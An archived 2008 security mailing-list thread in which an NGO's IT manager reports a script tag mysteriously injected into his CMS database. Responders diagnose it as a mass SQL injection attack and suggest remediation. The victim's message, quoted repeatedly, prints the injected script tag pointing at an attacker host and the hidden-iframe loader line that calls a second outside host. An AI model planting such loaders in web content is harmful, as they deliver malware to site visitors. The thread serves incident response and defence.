|

Mysterious JavaScript appearance in website database

View: New views

6 Messages — Rating Filter: Alert me

	Mysterious JavaScript appearance in website database by Glenn Gillis :: Rate this Message: Reply to Author \| View Threaded \| Show Only this Message On Sunday, 2008-April-13 at 01:07:38.030 UTC, the CMS database of the U.S.-based NGO I work for mysteriously had a JavaScript URL appended to the titles of much of the content on our website: <script src=http://www.nihaorr1.com/1.js></script> NB: the last modified dates for all of the content containing a reference to this script are identical, right down the 1/100 second. The contents of the script apparently attempts to open an iframe to a non-existent domain, "nmidahena.com": document.writeln("<iframe width=\'10\' height=\'1\' src=\'http:\/\/www.nmidahena.com\/1.htm\'><\/iframe>"); I haven't found any reports of a new worm, etc. that might account for this, but when I Google "nmidahena.com" I get over 100,000 hits for other sites on which this script is present. We are running a custom-developed CMS with MS-SQL Server 2000 as the backend, on Windows NT Server 4.0 SP6a and IIS 4.0 (Yes, I know! The NT Server is fully patched with whatever OS, IIS and SQL Server 2K hotfixes released prior to NT4's end-of-life declaration by MS, for what it's worth.) Anyone have an idea what might have caused this? -- Thanks, Glenn Gillis ELAW U.S. Information Technology Manager Environmental Law Alliance Worldwide
	Re: Mysterious JavaScript appearance in website database by Jon Oberheide-2 :: Rate this Message: Reply to Author \| View Threaded \| Show Only this Message Looks like an SQL injection attack. Take a look in your MS-SQL database at the affected entries and I bet you'll see the nmidahena reference. Since this is a widespread, automated attack that has affected other sites, it's unlikely it was targeted at your specific organization or custom CMS. Give your codebase a thorough audit for SQL injection vectors. Regards, Jon Oberheide On Mon, 2008-04-14 at 16:03 -0700, Glenn Gillis wrote: > On Sunday, 2008-April-13 at 01:07:38.030 UTC, the CMS database of the > U.S.-based NGO I work for mysteriously had a JavaScript URL appended to > the titles of much of the content on our website: > > <script src=http://www.nihaorr1.com/1.js></script> > > NB: the last modified dates for all of the content containing a > reference to this script are identical, right down the 1/100 second. > > The contents of the script apparently attempts to open an iframe to a > non-existent domain, "nmidahena.com": > > document.writeln("<iframe width=\'10\' height=\'1\' > src=\'http:\/\/www.nmidahena.com\/1.htm\'><\/iframe>"); > > I haven't found any reports of a new worm, etc. that might account for > this, but when I Google "nmidahena.com" I get over 100,000 hits for > other sites on which this script is present. > > We are running a custom-developed CMS with MS-SQL Server 2000 as the > backend, on Windows NT Server 4.0 SP6a and IIS 4.0 (Yes, I know! The NT > Server is fully patched with whatever OS, IIS and SQL Server 2K hotfixes > released prior to NT4's end-of-life declaration by MS, for what it's worth.) > > Anyone have an idea what might have caused this? -- Jon Oberheide <jon@...> GnuPG Key: 1024D/F47C17FE Fingerprint: B716 DA66 8173 6EDD 28F6 F184 5842 1C89 F47C 17FE signature.asc (196 bytes) Download Attachment
	Re: Mysterious JavaScript appearance in website database by Bob Cunningham :: Rate this Message: Reply to Author \| View Threaded \| Show Only this Message On Apr 14, 2008, at 1:03 PM, Glenn Gillis wrote: > The contents of the script apparently attempts to open an iframe to a > non-existent domain, "nmidahena.com See: http://isc.sans.org/diary.html?storyid=4240 http://isc.sans.org/diary.html?storyid=4144 http://www.finjan.com/MCRCblog.aspx?EntryId=1905
	Re: Mysterious JavaScript appearance in website database by Bojan Zdrnja-2 :: Rate this Message: Reply to Author \| View Threaded \| Show Only this Message Glenn, On Tue, Apr 15, 2008 at 1:03 AM, Glenn Gillis <glenn@...> wrote: > On Sunday, 2008-April-13 at 01:07:38.030 UTC, the CMS database of the > U.S.-based NGO I work for mysteriously had a JavaScript URL appended to the > titles of much of the content on our website: > > <script src=http://www.nihaorr1.com/1.js></script> > > NB: the last modified dates for all of the content containing a reference > to this script are identical, right down the 1/100 second. > > The contents of the script apparently attempts to open an iframe to a > non-existent domain, "nmidahena.com": > > document.writeln("<iframe width=\'10\' height=\'1\' > src=\'http:\/\/www.nmidahena.com\/1.htm\'><\/iframe>"); > > I haven't found any reports of a new worm, etc. that might account for > this, but when I Google "nmidahena.com" I get over 100,000 hits for > other sites on which this script is present. > > We are running a custom-developed CMS with MS-SQL Server 2000 as the > backend, on Windows NT Server 4.0 SP6a and IIS 4.0 (Yes, I know! The NT > Server is fully patched with whatever OS, IIS and SQL Server 2K hotfixes > released prior to NT4's end-of-life declaration by MS, for what it's worth.) > > Anyone have an idea what might have caused this? It's almost certainly an SQL injection attack that inserted the line of code above to all your HTML pages. These have become very common lately. I wrote a diary describing such an attack at http://isc.sans.org/diary.html?storyid=3823 Cheers, Bojan -- Bojan Zdrnja, B.Sc. CISSP/GCIA/GCIH Senior Information Security Consultant Infigo IS http://www.infigo.hr
	Re: Mysterious JavaScript appearance in website database by stremovsky :: Rate this Message: Reply to Author \| View Threaded \| Show Only this Message I can advise you to update your CMS system including all plugins and install SQL firewall. You can use GreenSQL db firewall to protect MySQL server from SQL injection attacks. http://www.greensql.net/ Best regards, Yuli On Tue, Apr 15, 2008 at 2:53 AM, Jon Oberheide <jon@...> wrote: > Looks like an SQL injection attack. > > Take a look in your MS-SQL database at the affected entries and I bet > you'll see the nmidahena reference. > > Since this is a widespread, automated attack that has affected other > sites, it's unlikely it was targeted at your specific organization or > custom CMS. Give your codebase a thorough audit for SQL injection > vectors. > > Regards, > Jon Oberheide > > > > > On Mon, 2008-04-14 at 16:03 -0700, Glenn Gillis wrote: > > On Sunday, 2008-April-13 at 01:07:38.030 UTC, the CMS database of the > > U.S.-based NGO I work for mysteriously had a JavaScript URL appended to > > the titles of much of the content on our website: > > > > <script src=http://www.nihaorr1.com/1.js></script> > > > > NB: the last modified dates for all of the content containing a > > reference to this script are identical, right down the 1/100 second. > > > > The contents of the script apparently attempts to open an iframe to a > > non-existent domain, "nmidahena.com": > > > > document.writeln("<iframe width=\'10\' height=\'1\' > > src=\'http:\/\/www.nmidahena.com\/1.htm\'><\/iframe>"); > > > > I haven't found any reports of a new worm, etc. that might account for > > this, but when I Google "nmidahena.com" I get over 100,000 hits for > > other sites on which this script is present. > > > > We are running a custom-developed CMS with MS-SQL Server 2000 as the > > backend, on Windows NT Server 4.0 SP6a and IIS 4.0 (Yes, I know! The NT > > Server is fully patched with whatever OS, IIS and SQL Server 2K hotfixes > > released prior to NT4's end-of-life declaration by MS, for what it's worth.) > > > > Anyone have an idea what might have caused this? > -- > Jon Oberheide <jon@...> > GnuPG Key: 1024D/F47C17FE > Fingerprint: B716 DA66 8173 6EDD 28F6 F184 5842 1C89 F47C 17FE > -- http://www.kyplex.com/
	Re: Mysterious JavaScript appearance in website database by Glenn Gillis :: Rate this Message: Reply to Author \| View Threaded \| Show Only this Message Bojan Zdrnja wrote, On 4/15/2008 12:26 AM: > Glenn, > > It's almost certainly an SQL injection attack that inserted the line > of code above to all your HTML pages. These have become very common > lately. > > I wrote a diary describing such an attack at > http://isc.sans.org/diary.html?storyid=3823 > > Cheers, > > Bojan Thanks, everyone, for your informative replies. I feel a little sheepish for not having heard of the Midhena virus prior to this, but as many of you pointed out, that seems to have been what got us. I wish I could update our CMS (if the vendor still supported it, instead of having moved on to deploying Plone sites!) I do believe I know the entry point of the SQL injection, however, and have a good backup of the database from just prior to the attack to roll back to. Thanks again! -- Glenn Gillis ELAW U.S. Information Technology Manager Environmental Law Alliance Worldwide P.S. Sorry for tripping everyone's email anti-virus software by enclosing the text of the .js file in my post! G.